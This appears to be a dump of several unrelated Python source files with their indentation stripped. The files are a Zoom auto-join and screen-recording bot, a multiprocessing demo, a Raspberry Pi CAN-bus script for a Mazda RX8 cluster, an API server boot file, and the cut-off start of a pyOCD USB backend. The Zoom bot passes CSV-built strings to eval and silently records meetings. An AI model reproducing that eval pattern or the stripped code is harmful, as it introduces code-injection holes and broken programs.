BASE_PATH = os.getenv('HOME')
CSV_PATH = os.path.join(BASE_PATH, "meetings.csv")
IMG_PATH = os.path.join(BASE_PATH, "img")
REC_PATH = os.path.join(BASE_PATH, "recordings")
DEBUG_PATH = os.path.join(REC_PATH, "screenshots")
# Add your Telegram token and chat id here
TELEGRAM_TOKEN = os.getenv('TELEGRAM_BOT_TOKEN')
TELEGRAM_CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')
TELEGRAM_RETRIES = 5
# Change name that is displayed inside Zoom meeting
DISPLAY_NAME = "Dieter Gaber"
TIME_FORMAT = "%Y-%m-%d_%H-%M-%S"
CSV_DELIMITER = ';'
ONGOING_MEETING = False
VIDEO_PANEL_HIDED = False
class BackgroundThread:
def __init__(self, interval=10):
        # Sleep interval between checks
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global ONGOING_MEETING
ONGOING_MEETING = True
logging.debug("Check continuously if meeting has ended..")
while ONGOING_MEETING:
# Check if recording
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'warn_meeting_recording.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'accept_recording.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if ended
if (pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'meeting_ended_by_host_1.png'),
confidence=0.9) is not None or pyautogui.locateOnScreen(
os.path.join(IMG_PATH, 'meeting_ended_by_host_2.png'), confidence=0.9) is not None):
ONGOING_MEETING = False
logging.info("Meeting ended by host..")
time.sleep(self.interval)
class HideViewOptionsThread:
    def __init__(self, interval=10, description=""):
        # Sleep interval between checks
        self.interval = interval
        # Description used in debug screenshot filenames
        self.description = description
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global VIDEO_PANEL_HIDED
logging.debug("Check continuously if screensharing is active..")
while ONGOING_MEETING:
# Check if host is sharing poll results
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'),
confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Check if view options available
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'view_options.png'), confidence=0.9) is not None:
if not VIDEO_PANEL_HIDED:
logging.info("Screensharing active..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
time.sleep(1)
# Hide video panel
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'show_video_panel.png'),
confidence=0.9) is not None:
# Leave 'Show video panel' and move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
VIDEO_PANEL_HIDED = True
else:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
# Move mouse from screen
pyautogui.moveTo(0, 0)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
except TypeError:
logging.error("Could not find view options!")
else:
VIDEO_PANEL_HIDED = False
time.sleep(self.interval)
def send_telegram_message(text):
global TELEGRAM_TOKEN
global TELEGRAM_CHAT_ID
global TELEGRAM_RETRIES
url_req = "https://api.telegram.org/bot" + TELEGRAM_TOKEN + "/sendMessage" + "?chat_id=" + TELEGRAM_CHAT_ID + "&text=" + text
tries = 0
done = False
while not done:
results = requests.get(url_req)
results = results.json()
done = 'ok' in results and results['ok']
        tries += 1
        if not done and tries < TELEGRAM_RETRIES:
            print("Sending Telegram message failed, retrying in 5 seconds...")
time.sleep(5)
if not done and tries >= TELEGRAM_RETRIES:
print("Sending Telegram message failed {} times, please check your credentials!".format(tries))
done = True
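# A minimal usage sketch, assuming TELEGRAM_BOT_TOKEN and TELEGRAM_CHAT_ID are set in the
# environment; the text is passed as a raw query parameter, so it should be short and URL-safe.
#
#   send_telegram_message("zoomrec container started")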
def check_connecting(zoom_pid, start_date, duration):
# Check if connecting
check_periods = 0
connecting = False
# Check if connecting
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is not None:
connecting = True
logging.info("Connecting..")
# Wait while connecting
# Exit when meeting ends after time
while connecting:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom_pid), signal.SIGQUIT)
return
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is None:
logging.info("Maybe not connecting anymore..")
check_periods += 1
if check_periods >= 2:
connecting = False
logging.info("Not connecting anymore..")
return
time.sleep(2)
def join_meeting(meet_id):
logging.info("Join a meeting..")
found_join_meeting = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), minSearchTime=2, confidence=0.9)
pyautogui.click(x, y)
found_join_meeting = True
except TypeError:
pass
if not found_join_meeting:
logging.error("Could not find 'Join Meeting' on screen!")
return False
time.sleep(2)
# Insert meeting id
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.write(meet_id, interval=0.1)
# Insert name
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.hotkey('ctrl', 'a')
pyautogui.write(DISPLAY_NAME, interval=0.1)
# Configure
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
time.sleep(2)
# Sometimes invalid id error is displayed
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'invalid_meeting_id.png'), confidence=0.9) is not None:
logging.error("Maybe a invalid meeting id was inserted..")
left = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'leave.png'), confidence=0.9)
pyautogui.click(x, y)
left = True
except TypeError:
pass
# Valid id
if left:
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), confidence=0.9) is not None:
logging.error("Invalid meeting id!")
return False
else:
return True
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'authorized_attendees_only.png'), confidence=0.9) is not None:
logging.error("This meeting is for authorized attendees only!")
return False
return True
def find_process_id_by_name(process_name):
list_of_process_objects = []
# Iterate over the all the running process
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
# Check if process name contains the given name string.
if process_name.lower() in pinfo['name'].lower():
list_of_process_objects.append(pinfo)
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return list_of_process_objects
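# A minimal usage sketch: find_process_id_by_name returns a list of {'pid': ..., 'name': ...}
# dicts for every running process whose name contains the given string (case-insensitive).
#
#   for proc_info in find_process_id_by_name('zoom'):
#       print(proc_info['pid'], proc_info['name'])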
def show_toolbars():
# Mouse move to show toolbar
width, height = pyautogui.size()
y = (height / 2)
pyautogui.moveTo(0, y, duration=0.5)
pyautogui.moveTo(width - 1, y, duration=0.5)
def join_audio(description):
audio_joined = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_with_computer_audio.png'), confidence=0.9)
logging.info("Join with computer audio..")
pyautogui.click(x, y)
audio_joined = True
return True
except TypeError:
logging.error("Could not join with computer audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_with_computer_audio_error.png")
time.sleep(1)
if not audio_joined:
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_audio.png'), confidence=0.9)
pyautogui.click(x, y)
join_audio(description)
except TypeError:
logging.error("Could not join audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_audio_error.png")
return False
def join(meet_id, meet_pw, duration, description):
global VIDEO_PANEL_HIDED
ffmpeg_debug = None
logging.info("Join meeting: " + description)
if DEBUG:
# Start recording
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
logging.info("Start recording..")
filename = os.path.join(
REC_PATH, time.strftime(TIME_FORMAT)) + "-" + description + "-JOIN.mkv"
command = "ffmpeg -nostats -loglevel quiet -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg_debug = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg_debug.pid), signal.SIGQUIT)
# Exit Zoom if running
exit_process_by_name("zoom")
# Start Zoom
zoom = subprocess.Popen("zoom", stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
    # Wait until a Zoom process exists
list_of_process_ids = find_process_id_by_name('zoom')
while len(list_of_process_ids) <= 0:
logging.info("No Running Zoom Process found!")
list_of_process_ids = find_process_id_by_name('zoom')
time.sleep(1)
    # Wait until Zoom has started
while pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'join_meeting.png'), confidence=0.9) is None:
logging.info("Zoom not ready yet!")
time.sleep(1)
logging.info("Zoom started!")
start_date = datetime.now()
joined = join_meeting(meet_id)
if not joined:
send_telegram_message("Failed to join meeting {}!".format(description))
logging.error("Failed to join meeting!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG and ffmpeg_debug is not None:
# closing ffmpeg
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
pyautogui.write(meet_pw, interval=0.2)
pyautogui.press('tab')
pyautogui.press('space')
# Joined meeting
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if meeting is started by host
check_periods = 0
meeting_started = True
time.sleep(2)
# Check if waiting for host
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9, minSearchTime=3) is not None:
meeting_started = False
logging.info("Please wait for the host to start this meeting.")
# Wait for the host to start this meeting
# Exit when meeting ends after time
while not meeting_started:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9) is None:
logging.info("Maybe meeting was started now.")
check_periods += 1
if check_periods >= 2:
meeting_started = True
logging.info("Meeting started by host.")
break
time.sleep(2)
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if in waiting room
check_periods = 0
in_waitingroom = False
time.sleep(2)
# Check if joined into waiting room
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'waiting_room.png'), confidence=0.9,
minSearchTime=3) is not None:
in_waitingroom = True
logging.info("Please wait, the meeting host will let you in soon..")
# Wait while host will let you in
# Exit when meeting ends after time
while in_waitingroom:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'waiting_room.png'), confidence=0.9) is None:
logging.info("Maybe no longer in the waiting room..")
check_periods += 1
if check_periods == 2:
logging.info("No longer in the waiting room..")
break
time.sleep(2)
# Meeting joined
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
logging.info("Joined meeting..")
# Check if recording warning is shown at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'warn_meeting_recording.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'accept_recording.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if host is sharing poll results at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Start BackgroundThread
BackgroundThread()
# Set computer audio
time.sleep(2)
if not join_audio(description):
logging.info("Exit!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
time.sleep(2)
join(meet_id, meet_pw, duration, description)
time.sleep(2)
logging.info("Enter fullscreen..")
show_toolbars()
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
fullscreen = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
fullscreen = True
except TypeError:
logging.error("Could not find fullscreen!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_fullscreen_error.png")
# TODO: Check for 'Exit Full Screen': already fullscreen -> fullscreen = True
# Screensharing already active
if not fullscreen:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
# Switch to fullscreen
time.sleep(2)
show_toolbars()
logging.info("Enter fullscreen..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'enter_fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not enter fullscreen by image!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_enter_fullscreen_error.png")
return
time.sleep(2)
# Screensharing not active
screensharing_active = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
screensharing_active = True
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
time.sleep(2)
if screensharing_active:
# hide video panel
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_hide_video_panel_error.png")
else:
# switch to speaker view
show_toolbars()
logging.info("Switch view..")
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
try:
# speaker view
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'speaker_view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not switch speaker view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_speaker_view_error.png")
try:
# minimize panel
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'minimize.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not minimize panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_minimize_error.png")
# Move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
# Audio
# Start recording
logging.info("Start recording..")
filename = os.path.join(REC_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + ".mkv"
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
command = "ffmpeg -nostats -loglevel error -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg.pid), signal.SIGQUIT)
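    # For illustration only: with a hypothetical 1920x1080 display on ":0" and description "meeting",
    # the assembled command is roughly
    #   ffmpeg -nostats -loglevel error -f pulse -ac 2 -i 1 -f x11grab -r 30 -s 1920x1080 -i :0 \
    #       -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 \
    #       <REC_PATH>/<timestamp>-meeting.mkv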
start_date = datetime.now()
end_date = start_date + timedelta(seconds=duration + 300) # Add 5 minutes
# Start thread to check active screensharing
    HideViewOptionsThread(description=description)
# Send Telegram notification
send_telegram_message("Joined Meeting '{}' and started recording.".format(description))
meeting_running = True
while meeting_running:
time_remaining = end_date - datetime.now()
if time_remaining.total_seconds() < 0 or not ONGOING_MEETING:
meeting_running = False
else:
print(f"Meeting ends in {time_remaining}", end="\r", flush=True)
time.sleep(5)
logging.info("Meeting ends at %s" % datetime.now())
# Close everything
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
os.killpg(os.getpgid(ffmpeg.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
if not ONGOING_MEETING:
try:
# Press OK after meeting ended by host
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'ok.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_ok_error.png")
send_telegram_message("Meeting '{}' ended.".format(description))
def exit_process_by_name(name):
list_of_process_ids = find_process_id_by_name(name)
if len(list_of_process_ids) > 0:
logging.info(name + " process exists | killing..")
for elem in list_of_process_ids:
process_id = elem['pid']
try:
os.kill(process_id, signal.SIGKILL)
except Exception as ex:
logging.error("Could not terminate " + name +
"[" + str(process_id) + "]: " + str(ex))
def join_ongoing_meeting():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
for row in csv_reader:
# Check and join ongoing meeting
curr_date = datetime.now()
# Monday, tuesday, ..
if row["weekday"].lower() == curr_date.strftime('%A').lower():
curr_time = curr_date.time()
start_time_csv = datetime.strptime(row["time"], '%H:%M')
start_date = curr_date.replace(
hour=start_time_csv.hour, minute=start_time_csv.minute)
start_time = start_date.time()
end_date = start_date + \
timedelta(seconds=int(row["duration"]) * 60 + 300) # Add 5 minutes
end_time = end_date.time()
recent_duration = (end_date - curr_date).total_seconds()
if start_time < end_time:
if start_time <= curr_time <= end_time:
if str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
else: # crosses midnight
if curr_time >= start_time or curr_time <= end_time:
if str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
def setup_schedule():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
line_count = 0
for row in csv_reader:
if str(row["record"]) == 'true':
cmd_string = "schedule.every()." + row["weekday"] \
+ ".at(\"" \
+ (datetime.strptime(row["time"], '%H:%M') - timedelta(minutes=1)).strftime('%H:%M') \
+ "\").do(join, meet_id=\"" + row["id"] \
+ "\", meet_pw=\"" + row["password"] \
+ "\", duration=" + str(int(row["duration"]) * 60) \
+ ", description=\"" + row["description"] + "\")"
cmd = compile(cmd_string, "<string>", "eval")
eval(cmd)
line_count += 1
logging.info("Added %s meetings to schedule." % line_count)
def main():
try:
if DEBUG and not os.path.exists(DEBUG_PATH):
os.makedirs(DEBUG_PATH)
except Exception:
logging.error("Failed to create screenshot folder!")
raise
setup_schedule()
join_ongoing_meeting()
if __name__ == '__main__':
main()
while True:
schedule.run_pending()
time.sleep(1)
time_of_next_run = schedule.next_run()
time_now = datetime.now()
remaining = time_of_next_run - time_now
print(f"Next meeting in {remaining}", end="\r", flush=True)
|
multiprocessing4__.py
|
# multiprocessing4.py
# -*- coding: utf-8 -*-
from multiprocessing import Process, Queue
import os, time, random
# Code run by the process that writes data:
def write(q):
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# Code run by the process that reads data:
def read(q):
while True:
value = q.get(True)
print('Get %s from queue.' % value)
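# A minimal sketch of a sentinel-based reader (hypothetical variant): if the writer puts
# None on the queue when it is done, the reader can exit on its own and the parent could
# call pr.join() instead of pr.terminate().
def read_until_sentinel(q):
    while True:
        value = q.get(True)
        if value is None:  # sentinel pushed by the writer when it has finished
            break
        print('Get %s from queue.' % value)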
if __name__ == '__main__':
# The parent process creates the Queue and passes it to both child processes:
q = Queue()
pw = Process(target = write, args = (q,))
pr = Process(target = read, args = (q,))
# Start child process pw (writer):
pw.start()
# Start child process pr (reader):
pr.start()
# Wait for pw to finish:
pw.join()
# pr runs an infinite loop and can never be joined, so terminate it forcibly:
pr.terminate()
|
SPEED(run_with_python3).py
|
#!/usr/bin/python3
#
#
# This python3 program sends out CAN data from the PiCAN2 board to a Mazda RX8 instrument cluster.
# For use with PiCAN boards on the Raspberry Pi
# http://skpang.co.uk/catalog/pican2-canbus-board-for-raspberry-pi-2-p-1475.html
#
# Make sure Python-CAN is installed first http://skpang.co.uk/blog/archives/1220
#
#
#
import can
import time
import os
import subprocess
from threading import Thread
import multiprocessing
import re
RPM_PID = 0x201
#oil temp 0x420
print('Bring up CAN0....')
os.system("sudo /sbin/ip link set can0 up type can bitrate 500000")
time.sleep(0.1)
print('Ready')
try:
bus = can.interface.Bus(channel='can0', bustype='socketcan_native')
except OSError:
print('Cannot find PiCAN board.')
# GPIO and led are never imported or defined in this script, so just exit
exit()
seconds = .1
run = True
speed_in = 40
rpm_in = 0
data = [rpm_in,0x00,0,0,speed_in,0,0,0]
# def rpm_go():
# while run:
# # for rpm in range(50,130):
# # GPIO.output(led,True)
# msg = can.Message(arbitration_id=RPM_PID,data=[0,0x00,0,0,speed_in,0,0,0],extended_id=False)
# bus.send(msg)
# # print(' {0:d}'.format(rpm))
# time.sleep(seconds)
# # GPIO.output(led,False)
# # time.sleep(0.04)
def speed_test(list_in):
'''gets the internet speed'''
while True:
response = subprocess.Popen('/usr/local/bin/speedtest-cli --simple', shell=True, stdout=subprocess.PIPE).stdout.read().decode('utf-8')
ping = re.findall(r'Ping:\s(.*?)\s', response, re.MULTILINE)
download = re.findall(r'Download:\s(.*?)\s', response, re.MULTILINE)
upload = re.findall(r'Upload:\s(.*?)\s', response, re.MULTILINE)
ping = ping[0].replace(',', '.')
download = download[0].replace(',', '.')
upload = upload[0].replace(',', '.')
print(download,upload)
list_in['ping'] = ping
list_in['download'] = download
list_in['upload'] = upload
time.sleep(300)
def tac():
while run:
for rpm in range(0,150):
# GPIO.output(led,True)
data[0] = rpm
# print(' {0:d}'.format(rpm))
time.sleep(0.4)
# time.sleep(0.04)
def send_msg():
# run speed test
manager = multiprocessing.Manager()
list_val = manager.dict({'download': 0.0,'upload':0.0,'ping':0.0})
p1 = multiprocessing.Process(target=speed_test,args=[list_val])
p1.start()
while run:
download = list_val['download']
upload = list_val['upload']
temp = float(download)/1.6 + 39
data[4] = int(round(temp))
temp = float(upload)/10 * 15
data[0] = int(round(temp))
# data_in = [rpm_in,0x00,0,0,speed_in,0,0,0]
msg = can.Message(arbitration_id=RPM_PID,data=data,extended_id=False)
bus.send(msg)
time.sleep(0.1)
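# A small helper sketch for the two conversions used in send_msg(): the constants mirror
# the inline math above (speedometer byte = Mbit/s / 1.6 + 39, tachometer byte =
# Mbit/s / 10 * 15) and are taken from that code, not from documented RX8 cluster values.
def speedtest_to_cluster_bytes(download_mbit, upload_mbit):
    speed_byte = int(round(float(download_mbit) / 1.6 + 39))  # goes into data[4]
    rpm_byte = int(round(float(upload_mbit) / 10 * 15))       # goes into data[0]
    return speed_byte, rpm_byte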
# Main loop
try:
t1 = Thread(target=send_msg)
t1.start()
t2 = Thread(target=tac)
# t2.start()
while run:
Myinput = input("(r)pm/(s)peed/delay: ")
if Myinput == "exit":
run = False
elif Myinput[0] == 'r':
speed_in = int(Myinput[1:])
elif Myinput[0] == 's':
temp = float(Myinput[1:])/1.6 + 39
speed_in = int(round(temp))
else:
seconds = float(Myinput)
print('second is', seconds)
data[4] = speed_in
t1.join()
# t2.join()
except KeyboardInterrupt:
#Catch keyboard interrupt
# GPIO and led are never imported or defined in this script, so there is no LED to reset here
run = False
os.system("sudo /sbin/ip link set can0 down")
print('\n\rKeyboard interrupt')
|
boot.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import sys
import threading
from api import Servant, Scheduler, Proxy
from cmdexecutor import exec_linux_cmd
from extloader import load_exts, set_ext_dict_to_topology
from operations import get_operation_dict
from server import create_server_instance
from topology import Topology
def create_api_service(opts={}):
# loads extensions
ext_dict = load_exts()
# creates topology
topology = Topology()
# creates api service
servant = Servant(topology)
scheduler = Scheduler()
proxy = Proxy(scheduler, servant)
# configures api service
scheduler.daemon = True
servant.set_operation_dict(get_operation_dict())
# configures topology
set_ext_dict_to_topology(ext_dict, topology)
if 'is_exec_nothing' not in opts or not opts['is_exec_nothing']:
topology.set_cmdexecutor(exec_linux_cmd)
return proxy
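# For example (hypothetical usage), a proxy without a command executor can be built via the
# 'is_exec_nothing' option handled above:
#   dry_run_api = create_api_service(opts={'is_exec_nothing': True})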
def boot(argvs=[]):
logging.basicConfig(level=logging.DEBUG)
api_service = create_api_service()
server_instance = create_server_instance(port=8888, api=api_service)
def server_instance_task():
try:
logging.info('Starting server instance.')
server_instance.start()
finally:
logging.info('server instance stopped.')
def start_thread_as_daemon(target, name):
th = threading.Thread(target=target, name=name)
th.daemon = True
th.start()
return th
api_service.start()
th_server_instance = start_thread_as_daemon(
target=server_instance_task,
name='server_instance_thread')
server_instance_join_timeout = 10.0
while th_server_instance.is_alive():
try:
th_server_instance.join(server_instance_join_timeout)
except (KeyboardInterrupt, SystemExit):
logging.info('Interrupted')
server_instance.stop()
api_service.stop()
logging.info('main thread terminated.')
if __name__ == '__main__':
argvs = sys.argv
boot(argvs)
# EOF
|
pyusb_backend.py
|
# pyOCD debugger
# Copyright (c) 2006-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import six
from time import sleep
import platform
import errno
from .interface import Interface
from .common import (
